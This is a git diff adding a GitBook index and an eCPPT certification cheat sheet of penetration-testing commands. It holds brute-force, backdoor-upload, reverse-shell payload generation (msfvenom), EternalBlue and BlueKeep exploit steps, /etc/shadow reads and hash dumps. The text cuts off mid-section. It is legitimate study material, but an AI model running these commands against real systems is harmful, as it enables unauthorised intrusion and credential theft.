Origin](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.3-same-origin.md) + * [2.1.4 Cookies](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.4-cookies.md) + * [2.1.5 Session](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.5-session.md) + * [2.1.6 Web App Proxies](readme/ecpptv3/web-app-security/5.1-web-app-concepts/5.1.6-web-app-proxies.md) + * [2.2 - Information Gathering](readme/ecpptv3/web-app-security/5.2-information-gathering/README.md) + * [2.2.1 Gathering Information on Your Targets](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.1-gathering-information-on-your-targets.md) + * [2.2.2 Infrastructure](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.2-infrastructure.md) + * [2.2.3 Fingerprinting Frameworks and Applications](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.3-fingerprinting-frameworks-and-applications.md) + * [2.2.4 Fingerprinting Custom Applications](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.4-fingerprinting-custom-applications.md) + * [2.2.5 Enumerating Resources](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.5-enumerating-resources.md) + * [2.2.6 Information Disclosure Through Misconfiguration](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.6-information-disclosure-through-misconfiguration.md) + * [2.2.7 Google Hacking](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.7-google-hacking.md) + * [2.2.8 Shodan HQ](readme/ecpptv3/web-app-security/5.2-information-gathering/5.2.8-shodan-hq.md) + * [2.3 - Cross Site Scripting](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/README.md) + * [2.3.1 XSS Anatomy](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.1-cross-site-scripting.md) + * [2.3.2 Reflected XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.2-anatomy-of-an-xss-exploitation.md) + * [2.3.3 Stored XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.3-the-three-types-of-xss.md) + * [2.3.4 DOM-Based XSS](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.4-finding-xss.md) + * [2.3.5 Identifying & Exploiting XSS with XSSer](readme/ecpptv3/web-app-security/5.3-cross-site-scripting/5.3.5-xss-exploitation.md) + * [2.4 - SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/README.md) + * [2.4.1 Introduction to SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.1-introduction-to-sql-injection.md) + * [2.4.2 Finding SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.2-finding-sql-injection.md) + * [2.4.3 Exploiting In-Band SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.3-exploiting-in-band-sql-injection.md) + * [2.4.4 Exploiting Error-Based SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.4-exploiting-error-based-sql-injection.md) + * [2.4.5 Exploiting Blind SQL Injection](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.5-exploiting-blind-sql-injection.md) + * [2.4.6 SQLMap](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.6-sqlmap.md) + * [2.4.7 Mitigation Strategies](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.7-mitigation-strategies.md) + * [2.4.8 From SQLi to Server Takeover](readme/ecpptv3/web-app-security/5.4-sql-injection/5.4.8-from-sqli-to-server-takeover.md) + * [2.5 - Other Common Web Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/README.md) + * [2.5.1 Session Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.1-session-attacks.md) + * [2.5.2 CSRF](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.2-csrf.md) + * [2.5.3 File and Resource Attacks](readme/ecpptv3/web-app-security/5.5-other-common-web-attacks/5.5.3-file-and-resource-attacks.md) + * [3๏ธโƒฃ 3 - Network Security](readme/ecpptv3/network-security/README.md) + * [3.1 Network Based Attacks](readme/ecpptv3/network-security/2.1-1.md) + * [3.2 Linux Vulnerabilities](readme/ecpptv3/network-security/4.1-linux-vulnerabilities.md) + * [3.3 - Exploitation](readme/ecpptv3/network-security/2.4/README.md) + * [3.3.1 Linux Exploitation](readme/ecpptv3/network-security/2.4/4.2-linux-exploitation.md) + * [4๏ธโƒฃ 4 - Exploit Development](readme/ecpptv3/system-security/README.md) + * [4.1 Architecture Foundamentals](readme/ecpptv3/system-security/1.1-architecture-foundamentals.md) + * [4.2 Assemblers and Tools](readme/ecpptv3/system-security/1.2-assemblers-and-tools.md) + * [4.3 Buffer Overflow](readme/ecpptv3/system-security/1.3-buffer-overflow.md) + * [4.4 Cryptography](readme/ecpptv3/system-security/1.4-cryptography.md) + * [4.5 Malware](readme/ecpptv3/system-security/1.5-malware.md) + * [4.6 Shellcoding](readme/ecpptv3/system-security/1.6-shellcoding.md) + * [5๏ธโƒฃ 5 - Post-Exploitation](readme/ecpptv3/linux-exploitation/README.md) + * [5.1 Linux Post-Exploitation](readme/ecpptv3/linux-exploitation/4.3-linux-post-exploitation.md) + * [5.2 - Linux Privilege Escalation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/README.md) + * [5.2.1 Kernel Exploitation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md) + * [5.2.2 SUID Exploitation](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md) + * [5.2.3 CronJobs](readme/ecpptv3/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md) + * [5.3 - Post Expolitation / Pivoting](readme/ecpptv3/linux-exploitation/2.4-1/README.md) + * [5.3.1 Pivoting Guidelines](readme/ecpptv3/linux-exploitation/2.4-1/2.2-pivoting.md) + * [5.3.2 Pivoting Example (3 Targets)](readme/ecpptv3/linux-exploitation/2.4-1/2.2-pivoting-1.md) + * [6๏ธโƒฃ 6 - โ€‹Red Teaming](readme/ecpptv3/wi-fi-security/README.md) + * [6.1 - Active Directory Penetration Testing](readme/ecpptv3/wi-fi-security/6.1-change-it.md) + * [6.2 - Command & Control (C2/C\&C)](readme/ecpptv3/wi-fi-security/6.1-change-it-1.md) + * [eCPPTv2](readme/readme/README.md) + * [1๏ธโƒฃ 1 - โ€‹System Security](readme/readme/system-security/README.md) + * [1.1 Architecture Foundamentals](readme/readme/system-security/1.1-architecture-foundamentals.md) + * [1.2 Assemblers and Tools](readme/readme/system-security/1.2-assemblers-and-tools.md) + * [1.3 Buffer Overflow](readme/readme/system-security/1.3-buffer-overflow.md) + * [1.4 Cryptography](readme/readme/system-security/1.4-cryptography.md) + * [1.5 Malware](readme/readme/system-security/1.5-malware.md) + * [1.6 Shellcoding](readme/readme/system-security/1.6-shellcoding.md) + * [2๏ธโƒฃ 2 - Network Security](readme/readme/network-security/README.md) + * [2.1 System/Host Based Attacks](readme/readme/network-security/2.1/README.md) + * [2.1.1 Windows Vulnerabilities](readme/readme/network-security/2.1/windows-vulnerabilities.md) + * [2.2 Network Based Attacks](readme/readme/network-security/2.1-1.md) + * [2.3 The Metasploit Framework (MSF)](readme/readme/network-security/2.3/README.md) + * [MSF Introduction](readme/readme/network-security/2.3/msf-introduction.md) + * [Information Gathering & Enumeration](readme/readme/network-security/2.3/information-gathering-and-enumeration.md) + * [Vulnerability Scanning](readme/readme/network-security/2.3/vulnerability-scanning.md) + * [Client-Side Attacks](readme/readme/network-security/2.3/client-side-attacks.md) + * [Post Exploitation](readme/readme/network-security/2.3/post-exploitation.md) + * [Armitage](readme/readme/network-security/2.3/armitage.md) + * [2.4 Exploitation](readme/readme/network-security/2.4.md) + * [2.5 - Post Expolitation / Pivoting](readme/readme/network-security/2.4-1/README.md) + * [2.5.1 Pivoting Guidelines](readme/readme/network-security/2.4-1/2.2-pivoting.md) + * [2.5.2 Pivoting Example (3 Targets)](readme/readme/network-security/2.4-1/2.2-pivoting-1.md) + * [2.6 Social Engineering](readme/readme/network-security/2.4-2.md) + * [3๏ธโƒฃ 3 - PowerShell for PT](readme/readme/powershell-for-pt/README.md) + * [3.1 PowerShell](readme/readme/powershell-for-pt/3.1.md) + * [4๏ธโƒฃ 4 - Linux Exploitation](readme/readme/linux-exploitation/README.md) + * [4.1 Linux Vulnerabilities](readme/readme/linux-exploitation/4.1-linux-vulnerabilities.md) + * [4.2 Linux Exploitation](readme/readme/linux-exploitation/4.2-linux-exploitation.md) + * [4.3 Linux Post-Exploitation](readme/readme/linux-exploitation/4.3-linux-post-exploitation.md) + * [4.4 Linux Privilege Escalation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/README.md) + * [4.4.1 Kernel Exploitation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.1-kernel-exploitation.md) + * [4.4.2 SUID Exploitation](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.2-suid-exploitation.md) + * [4.4.3 CronJobs](readme/readme/linux-exploitation/4.4-linux-privilege-escalation/4.4.3-cronjobs.md) + * [5๏ธโƒฃ 5 - Web App Security](readme/readme/web-app-security/README.md) + * [5.1 - Web App Concepts](readme/readme/web-app-security/5.1-web-app-concepts/README.md) + * [5.1.1 HTTP/S Protocol](readme/readme/web-app-security/5.1-web-app-concepts/5.1.1-http-s-protocol.md) + * [5.1.2 Encoding](readme/readme/web-app-security/5.1-web-app-concepts/5.1.2-encoding.md) + * [5.1.3 Same Origin](readme/readme/web-app-security/5.1-web-app-concepts/5.1.3-same-origin.md) + * [5.1.4 Cookies](readme/readme/web-app-security/5.1-web-app-concepts/5.1.4-cookies.md) + * [5.1.5 Session](readme/readme/web-app-security/5.1-web-app-concepts/5.1.5-session.md) + * [5.1.6 Web App Proxies](readme/readme/web-app-security/5.1-web-app-concepts/5.1.6-web-app-proxies.md) + * [5.2 - Information Gathering](readme/readme/web-app-security/5.2-information-gathering/README.md) + * [5.2.1 Gathering Information on Your Targets](readme/readme/web-app-security/5.2-information-gathering/5.2.1-gathering-information-on-your-targets.md) + * [5.2.2 Infrastructure](readme/readme/web-app-security/5.2-information-gathering/5.2.2-infrastructure.md) + * [5.2.3 Fingerprinting Frameworks and Applications](readme/readme/web-app-security/5.2-information-gathering/5.2.3-fingerprinting-frameworks-and-applications.md) + * [5.2.4 Fingerprinting Custom Applications](readme/readme/web-app-security/5.2-information-gathering/5.2.4-fingerprinting-custom-applications.md) + * [5.2.5 Enumerating Resources](readme/readme/web-app-security/5.2-information-gathering/5.2.5-enumerating-resources.md) + * [5.2.6 Information Disclosure Through Misconfiguration](readme/readme/web-app-security/5.2-information-gathering/5.2.6-information-disclosure-through-misconfiguration.md) + * [5.2.7 Google Hacking](readme/readme/web-app-security/5.2-information-gathering/5.2.7-google-hacking.md) + * [5.2.8 Shodan HQ](readme/readme/web-app-security/5.2-information-gathering/5.2.8-shodan-hq.md) + * [5.3 - Cross Site Scripting](readme/readme/web-app-security/5.3-cross-site-scripting/README.md) + * [5.3.1 XSS Anatomy](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.1-cross-site-scripting.md) + * [5.3.2 Reflected XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.2-anatomy-of-an-xss-exploitation.md) + * [5.3.3 Stored XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.3-the-three-types-of-xss.md) + * [5.3.4 DOM-Based XSS](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.4-finding-xss.md) + * [5.3.5 Identifying & Exploiting XSS with XSSer](readme/readme/web-app-security/5.3-cross-site-scripting/5.3.5-xss-exploitation.md) + * [5.4 - SQL Injection](readme/readme/web-app-security/5.4-sql-injection/README.md) + * [5.4.1 Introduction to SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.1-introduction-to-sql-injection.md) + * [5.4.2 Finding SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.2-finding-sql-injection.md) + * [5.4.3 Exploiting In-Band SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.3-exploiting-in-band-sql-injection.md) + * [5.4.4 Exploiting Error-Based SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.4-exploiting-error-based-sql-injection.md) + * [5.4.5 Exploiting Blind SQL Injection](readme/readme/web-app-security/5.4-sql-injection/5.4.5-exploiting-blind-sql-injection.md) + * [5.4.6 SQLMap](readme/readme/web-app-security/5.4-sql-injection/5.4.6-sqlmap.md) + * [5.4.7 Mitigation Strategies](readme/readme/web-app-security/5.4-sql-injection/5.4.7-mitigation-strategies.md) + * [5.4.8 From SQLi to Server Takeover](readme/readme/web-app-security/5.4-sql-injection/5.4.8-from-sqli-to-server-takeover.md) + * [5.5 - Other Common Web Attacks](readme/readme/web-app-security/5.5-other-common-web-attacks/README.md) + * [5.5.1 Session Attacks](readme/readme/web-app-security/5.5-other-common-web-attacks/5.5.1-session-attacks.md) + * [5.5.2 CSRF](readme/readme/web-app-security/5.5-other-common-web-attacks/5.5.2-csrf.md) + * [6๏ธโƒฃ 6 - โ€‹Wi-Fi Security](readme/readme/wi-fi-security/README.md) + * [6.1 Traffic Analysis](readme/readme/wi-fi-security/6.1-change-it.md) + * [7๏ธโƒฃ 7 - โ€‹Metasploit & Ruby](readme/readme/metasploit-and-ruby/README.md) + * [7.1 Metasploit](readme/readme/metasploit-and-ruby/7.1.md) + * [๐Ÿ“„ Report](readme/readme/metasploit-and-ruby-1/README.md) + * [How to write a PT Report](readme/readme/metasploit-and-ruby-1/7.1.md) +* [๐Ÿ›ฃ๏ธ RoadMap & My Experience](roadmap-and-my-experience.md) +* [๐Ÿ“” eCPPT Cheat Sheet](ecppt-cheat-sheet.md) diff --git a/ecppt-cheat-sheet.md b/ecppt-cheat-sheet.md new file mode 100644 index 0000000..9736cfb --- /dev/null +++ b/ecppt-cheat-sheet.md @@ -0,0 +1,3567 @@ +# ๐Ÿ“” eCPPT Cheat Sheet + +#### Networking + + + +**Routing** + +``` +# Linux +ip route + +# Windows +route print + +# Mac OS X / Linux +netstat -r +``` + +**IP** + +``` +# Linux +ip a +ip -br -c a + +# Windows +ipconfig /all + +# Mac OS X / Linux +ifconfig +``` + +**ARP** + +``` +# Linux +ip neighbour + +# Windows +arp -a + +# Mac OS X / Linux +arp +``` + +**Ports** + +``` +# Linux +netstat -tunp +netstat -tulpn +ss -tnl + +# Windows +netstat -ano + +# Mac OS X / Linux +netstat -p tcp -p udp +lsof -n -i4TCP -i4UDP +``` + +**Connect and Scan** + +``` +nc -v example.com 80 + +openssl s_client -connect : +openssl s_client -connect : -debug +openssl s_client -connect : -state +openssl s_client -connect : -quiet + +# Scan port +nc -zv +``` + +#### Information Gathering + + + +**Passive** + +``` +host +whatweb +whois +whois + +dnsrecon -d + +wafw00f -l +wafw00f -a + +sublist3r -d +theHarvester -d +theHarvester -d -b all +``` + +**Google Dorks** + +``` +site: +inurl: +site:*.sitename.com +intitle: +filetype: +intitle:index of +cache: +inurl:auth_user_file.txt +inurl:passwd.txt +inurl:wp-config.bak +``` + +**DNS** + +``` +sudo nano /etc/hosts +dnsenum +# e.g. dnsenum zonetransfer.me + +dig +dig axfr @DNS-server-name + +fierce --domain +``` + +**Host Discovery** + +``` +## Ping scan +sudo nmap -sn +## ARP scan +netdiscover -i eth1 -r + +# NMAP PORT SCAN +nmap +## Skip ping +nmap -Pn +## Host discovery + saving into file +nmap -sn / > hosts.txt +nmap -sn -T4 / -oG - | awk '/Up$/{print $2}' +## Scan all ports +nmap -p- +## Open ports scan + saving into file +nmap -Pn -sV -T4 -A -oN ports.txt -p- -iL hosts.txt --open +## Port 80 only scan +nmap -p 80 +## Custom list of ports scan +nmap -p 80,445,3389,8080 +## Custom ports range scan +nmap -p1-2000 +## Fast mode & verbose scan +nmap -F -v +## UDP scan +nmap -sU +## Service scan +nmap -sV +## Service + O.S. detection scan +sudo nmap -sV -O +## Default Scripts scan +nmap -sC +nmap -Pn -F -sV -O -sC +## Aggressive scan +nmap -Pn -F -A +## Timing (T0=slow ... T5=insanely fast) scan +nmap -Pn -F -T5 -sV -O -sC -v +## Output scan +nmap -Pn -F -oN outputfile.txt +nmap -Pn -F -oX outputfile.xml +## Output to all formats +nmap -Pn -sV -sC -O -oA outputfile +nmap -Pn -sV -sC -O -oA outputfile +nmap -A -oA outputfile +``` + +#### Footprinting & Scanning + + + +**Network Discovery** + +``` +sudo arp-scan -I eth1 +ping +sudo nmap -sn + +tracert google.com #Windows +traceroute google.com #Linux + +## fping +fping -I eth1 -g -a +## fping with no "Host Unreachable errors" +fping -I eth1 -g -a fping -I eth1 -g -a 2>/dev/null +``` + +#### Enumeration + + + +**SMB** + + + +**Nmap** + +``` +sudo nmap -p 445 -sV -sC -O +nmap -sU --top-ports 25 --open + +nmap -p 445 --script smb-protocols +nmap -p 445 --script smb-security-mode + +nmap -p 445 --script smb-enum-sessions +nmap -p 445 --script smb-enum-sessions --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-shares +nmap -p 445 --script smb-enum-shares --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-users --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-server-stats --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-domains--script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-groups--script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-services --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-enum-shares,smb-ls --script-args smbusername=,smbpassword= + +nmap -p 445 --script smb-os-discovery + +nmap -p445 --script=smb-vuln-* +``` + +**Nmblookup** + +
nmblookup -A <TARGET_IP>
+
+ +**SMBMap** + +``` +smbmap -u guest -p "" -d . -H + +smbmap -u -p '' -d . -H + +## Run a command +smbmap -u -p '' -H -x 'ipconfig' +## List all drives +smbmap -u -p '' -H -L +## List dir content +smbmap -u -p '' -H -r 'C$' +## Upload a file +smbmap -u -p '' -H --upload '/root/sample_backdoor' 'C$\sample_backdoor' +## Download a file +smbmap -u -p '' -H --download 'C$\flag.txt' +``` + +**SMB Connection** + +``` +# Connection +smbclient -L -N +smbclient -L -U +smbclient /// -U +smbclient ///admin -U admin +smbclient ///public -N #NULL Session +## SMBCLIENT +smbclient ///share_name +help +ls +get +``` + +**RPCClient** + +``` +rpcclient -U "" -N +## RPCCLIENT +enumdomusers +enumdomgroups +lookupnames admin +``` + +**Enum4Linux** + +``` +enum4linux -o +enum4linux -U +enum4linux -S +enum4linux -G +enum4linux -i +enum4linux -r -u "" -p "" +enum4linux -a -u "" -p "" +enum4linux -U -M -S -P -G + +## NULL SESSIONS + +# 1 - Use โ€œenum4linux -nโ€ to make sure if โ€œ<20>โ€ exists: +enum4linux -n +# 2 - If โ€œ<20>โ€ exists, it means Null Session could be exploited. Utilize the following command to get more details: +enum4linux +# 3 - If confirmed that Null Session exists, you can remotely list all share of the target: +smbclient -L WORKGROUP -I -N -U "" +# 4 - You also can connect the remote server by applying the following command: +smbclient \\\\\\c$ -N -U "" +# 5 - Download those files stored on the share drive: +smb: \> get file_shared.txt +``` + +**Hydra** + +``` +gzip -d /usr/share/wordlists/rockyou.txt.gz + +hydra -l admin -P /usr/share/wordlists/rockyou.txt smb +``` + +We can use a wordlist generator tools (how [Cewl](https://app.gitbook.com/s/iS3hadq7jVFgSa8k5wRA/practical-ethical-hacker-notes/tools/cewl)), to create custom wordlists. + +**Metasploit** + +``` +# METASPLOIT Starting +msfconsole +msfconsole -q + +# METASPLOIT SMB +use auxiliary/scanner/smb/smb_version +use auxiliary/scanner/smb/smb_enumusers +use auxiliary/scanner/smb/smb_enumshares +use auxiliary/scanner/smb/smb_login +use auxiliary/scanner/smb/pipe_auditor + +## set options depends on the selected module +set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt +set SMBUser +set RHOSTS +exploit +``` + +**FTP** + + + +**Nmap** + +``` +sudo nmap -p 21 -sV -sC -O +nmap -p 21 -sV -O + +nmap -p 21 --script ftp-anon +nmap -p 21 --script ftp-brute --script-args userdb= +``` + +**Ftp Client** + +``` +ftp +ls +cd /../.. +get +put +``` + +**Hydra** + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -t 4 ftp +``` + +**SSH** + + + +**Nmap** + +``` +# NMAP +sudo nmap -p 22 -sV -sC -O + +nmap -p 22 --script ssh2-enum-algos +nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full +nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=" + +nmap -p 22 --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=, ssh-run.password=" + +nmap -p 22 --script=ssh-brute --script-args userdb= +``` + +**Netcat** + +``` +# NETCAT +nc +nc 22 +``` + +**SSH** + +``` +ssh @ 22 +ssh root@ 22 +``` + +**Hydra** + +``` +hydra -l -P /usr/share/wordlists/rockyou.txt ssh +``` + +**Metasploit** + +``` +use auxiliary/scanner/ssh/ssh_login + +set RHOSTS +set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt +set STOP_ON_SUCCESS true +set VERBOSE true +exploit +``` + +**HTTP** + + + +**Nmap** + +``` +sudo nmap -p 80 -sV -O + +nmap -p 80 --script=http-enum -sV +nmap -p 80 --script=http-headers -sV +nmap -p 80 --script=http-methods --script-args http-methods.url-path=/webdav/ +nmap -p 80 --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ +``` + +**Alternative** + +``` +whatweb +http +browsh --startup-url http:// + +dirb http:// +dirb http:// /usr/share/metasploit-framework/data/wordlists/directory.txt + +hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/ #brute http basic auth +hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/ #brute http digest +hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed" # brute http post form +hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v" #brute http authenticated post form + +wget +curl | more +curl -I http:/// +curl --digest -u : http:/// + +lynx +``` + +**Metasploit** + +``` +use auxiliary/scanner/http/brute_dirs +use auxiliary/scanner/http/robots_txt +use auxiliary/scanner/http/http_header +use auxiliary/scanner/http/http_login +use auxiliary/scanner/http/http_version + +# Global set +setg RHOSTS +setg RHOST + +## set options depends on the selected module +set HTTP_METHOD GET +set TARGETURI // + +set USER_FILE +set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt +set VERBOSE false +set AUTH_URI // +exploit +``` + +**SQL** + + + +**Nmap** + +``` +sudo nmap -p 3306 -sV -O + +nmap -p 3306 --script=mysql-empty-password +nmap -p 3306 --script=mysql-info +nmap -p 3306 --script=mysql-users --script-args="mysqluser='',mysqlpass=''" +nmap -p 3306 --script=mysql-databases --script-args="mysqluser='',mysqlpass=''" +nmap -p 3306 --script=mysql-variables --script-args="mysqluser='',mysqlpass=''" + +nmap -p 3306 --script=mysql-audit --script-args="mysql-audit.username='',mysql-audit.password='',mysql-audit.filename=''" + +nmap -p 3306 --script=mysql-dump-hashes --script-args="username='',password=''" + +nmap -p 3306 --script=mysql-query --script-args="query='select count(*) from .;',username='',password=''" + +nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.10.13 + +## Microsoft SQL +nmap -sV -sC -p 1433 + +nmap -p 1433 --script ms-sql-info +nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 +nmap -p 1433 --script ms-sql-empty-password + +nmap -p 3306 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt + +nmap -p 3306 --script ms-sql-query --script-args mssql.username=,mssql.password=,ms-sql-query.query="SELECT * FROM master..syslogins" -oN output.txt + +nmap -p 3306 --script ms-sql-dump-hashes --script-args mssql.username=,mssql.password= + +nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="ipconfig" + +nmap -p 3306 --script ms-sql-xp-cmdshell --script-args mssql.username=,mssql.password=,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" +``` + +``` +# MYSQL +mysql -h -u +mysql -h -u root + +# Mysql client +help +show databases; +use ; +select count(*) from ; +select load_file("/etc/shadow"); +``` + +**Hydra** + +``` +hydra -l -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt mysql +``` + +**Metasploit** + +``` +use auxiliary/scanner/mysql/mysql_schemadump +use auxiliary/scanner/mysql/mysql_writable_dirs +use auxiliary/scanner/mysql/mysql_file_enum +use auxiliary/scanner/mysql/mysql_hashdump +use auxiliary/scanner/mysql/mysql_login + +## MS Sql +use auxiliary/scanner/mssql/mssql_login +use auxiliary/admin/mssql/mssql_enum +use auxiliary/admin/mssql/mssql_enum_sql_logins +use auxiliary/admin/mssql/mssql_exec +use auxiliary/admin/mssql/mssql_enum_domain_accounts + +# Global set +setg RHOSTS +setg RHOST + +## set options depends on the selected module +set USERNAME root +set PASSWORD "" + +set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt +set VERBOSE false +set PASSWORD "" + +set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt +set PASSWORD "" + +set USER_FILE /root/Desktop/wordlist/common_users.txt +set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt +set VERBOSE false +set STOP_ON_SUCCESS true + +set CMD whoami +exploit +``` + +**SMTP** + + + +**Nmap** + +``` +sudo nmap -p 25 -sV -sC -O + +nmap -sV -script banner +``` + +``` +nc 25 +telnet 25 + +# TELNET client - check supported capabilities +HELO attacker.xyz +EHLO attacker.xyz +``` + +``` +smtp-user-enum -U /usr/share/commix/src/txt/usernames.txt -t +``` + +**Metasploit** + +``` +# METASPLOIT +service postgresql start && msfconsole -q + +# Global set +setg RHOSTS +setg RHOST + +use auxiliary/scanner/smtp/smtp_enum +``` + +#### Vulnerability Assessment + + + +``` +# HEARTBLEED +nmap -sV --script ssl-enum-ciphers -p +nmap -sV --script ssl-heartbleed -p 443 + +# ETERNALBLUE +nmap --script smb-vuln-ms17-010 -p 445 + +# BLUEKEEP +msfconsole +use exploit/windows/rdp/cve_2019_0708_bluekeep_rce + +# LOG4J +nmap --script log4shell.nse --script-args log4shell.callback-server=:1389 -p 8080 +``` + +``` +searchsploit badblue 2.7 +``` + +#### Host Based Attacks + + + +**Windows Exploitation** + + + +**IIS WEBDAV** + +``` +# IIS WEBDAV +davtest -url +davtest -auth : -url http:///webdav + +cadaver [OPTIONS] + +nmap -p 80 --script http-enum -sV +``` + +``` +msfvenom -p LHOST= LPORT= -f > shell.asp + +msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp +``` + +``` +hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt http-get /webdav/ +``` + +``` +## METASPLOIT +# Global set +setg RHOSTS +setg RHOST + +use exploit/multi/handler +use exploit/windows/iis/iis_webdav_upload_asp + +set payload windows/meterpreter/reverse_tcp +set LHOST +set LPORT + +set HttpUsername +set HttpPassword +set PATH /webdav/metasploit.asp +``` + +**SMB** + + + +**Nmap** + +``` +nmap -p 445 -sV -sC + +nmap --script smb-vuln-ms17-010 -p 445 +``` + +**Metasploit** + +``` +# Global set +setg RHOSTS +setg RHOST + +use auxiliary/scanner/smb/smb_login +use exploit/windows/smb/psexec +use exploit/windows/smb/ms17_010_eternalblue + +set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt +set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt +set VERBOSE false + +set SMBUser +set SMBPass +``` + +``` +psexec.py @ cmd.exe +``` + +``` +## Manual Exploit - AutoBlue +cd +mkdir tools +cd /home/kali/tools +sudo git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git +cd AutoBlue-MS17-010 +pip install -r requirements.txt + +cd shellcode +chmod +x shell_prep.sh +./shell_prep.sh +# LHOST = Host Kali Linux IP +# LPORT = Port Kali will listen for the reverse shell + +nc -nvlp 1234 # On attacker VM + +cd .. +chmod +x eternalblue_exploit7.py +python eternalblue_exploit7.py shellcode/sc_x64.bin +``` + +**RDP** + +``` +# RDP +nmap -sV +``` + +``` +## METASPLOIT +# Global set +setg RHOSTS +setg RHOST + +use auxiliary/scanner/rdp/rdp_scanner +use auxiliary/scanner/rdp/cve_2019_0708_bluekeep + +set RPORT + +# ! Kernel crash may be caused ! +use exploit/windows/rdp/cve_2019_0708_bluekeep_rce + +show targets +set target +set GROOMSIZE 50 +``` + +``` +hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp:// -s +``` + +``` +xfreerdp /u: /p: /v:: + +xfreerdp /u: /p: /v:: /w:1920 /h:1080 /fonts /smart-sizing +``` + +**WINRM** + +``` +# WINRM +crackmapexec [OPTIONS] +evil-winrm -i -u -p + +nmap --top-ports 7000 +nmap -sV -p 5985 +``` + +``` +crackmapexec winrm -u -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt + +crackmapexec winrm -u -p -x "whoami" +crackmapexec winrm -u -p -x "systeminfo" +``` + +``` +# Command Shell +evil-winrm.rb -u -p '' -i +``` + +``` +## METASPLOIT +# Global set +setg RHOSTS +setg RHOST + +use 